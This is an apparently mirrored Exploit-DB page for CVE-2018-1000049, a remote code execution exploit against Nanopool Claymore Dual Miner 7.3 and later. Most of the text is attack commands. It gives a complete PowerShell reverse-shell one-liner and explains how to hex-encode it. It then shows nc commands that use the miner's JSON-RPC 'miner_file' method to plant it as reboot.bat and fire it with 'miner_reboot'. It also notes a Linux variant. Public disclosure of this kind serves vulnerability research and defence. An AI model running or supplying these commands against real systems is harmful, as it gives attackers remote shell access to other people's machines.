Nanopool Claymore Dual Miner 7.3 – Remote Code Execution

• Exploit Database
• 18 阅读

• 作者： ReverseBrain
  日期： 2018-05-17
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/44638/

• # Exploit Title: Nanopool Claymore Dual Miner >= 7.3 Remote Code Execution
  # Date: 2018/02/09
  # Exploit Author: ReverseBrain
  # Vendor Homepage: https://nanopool.org/
  # Software Link: https://github.com/nanopool/Claymore-Dual-Miner
  # Version: 7.3 and later
  # Tested on: Windows, Linux
  # CVE : 2018-1000049
  
  Suppose the miner is running on localhost on port 3333. First of all you need to convert a .bat string into hexadecimal format, for example, this one uses powershell to spawn a reverse shell on localhost listening on port 1234:
  
  powershell.exe -Command "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2= $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
  
  Convert it into hexadecimal and paste it on the second parameter inside this string:
  
  echo '{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["reboot.bat","HEX_STRING"]}' | nc 127.0.0.1 3333 -v
  
  Then, to trigger the vulnerability just send {"id":0,"jsonrpc":"2.0","method":"miner_reboot"}
  string to the miner.
  
  echo '{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}' | nc 127.0.0.1 3333 -v
  
  You got the shell!
  
  This exploit works also on Linux, just substitute reboot.bat with reboot.bash or reboot.sh.